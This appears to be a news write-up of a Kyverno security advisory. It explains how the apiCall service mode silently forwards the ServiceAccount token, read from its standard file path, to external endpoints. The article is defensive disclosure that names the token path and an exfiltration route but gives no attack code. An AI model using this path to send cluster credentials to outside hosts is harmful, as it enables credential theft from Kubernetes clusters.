Kyverno apiCall Service Mode Exposes Kubernetes ServiceAccount Tokens by Default in High-Severity Vulnerability

A high-severity vulnerability in Kyverno's policy engine allows ServiceAccount tokens to be automatically forwarded to external endpoints without policy authors' knowledge or consent. The flaw, tracked as GHSA-8wfp-579w-6r25, stems from an insecure-by-default behavior in Kyverno's apiCall service mode, where the admission controller's ServiceAccount token is silently attached to outbound HTTP requests. This design permits credential exfiltration to attacker-controlled servers without requiring any explicit configuration by the policy author.

The exposed mechanism resides in the apiCall executor component at `pkg/engine/apicall/executor.go`. When processing requests, the code reads the ServiceAccount token directly from the standard Kubernetes token path (`/var/run/secrets/kubernetes.io/serviceaccount/token`) and injects it as an `Authorization: Bearer <token>` header whenever no explicit Authorization header exists in the policy definition. The affected code block checks if the header is empty, retrieves the token via `a.getToken()`, and adds it to the request. This logic operates silently, leaving no obvious indicators in policy configurations that outbound credential forwarding will occur.

Security researchers warn that the combination of undocumented behavior and insecure defaults creates significant risk in any environment where Kyverno policies communicate with external services. Clusters relying on apiCall service mode for webhook integrations or external validation could expose ServiceAccount credentials—potentially with elevated permissions—to untrusted endpoints. The lack of opt-in requirements means that even policy authors unaware of this behavior may inadvertently create exfiltration pathways. Organizations running affected Kyverno versions should audit apiCall policies for external communications and review mitigation measures outlined in the official security advisory.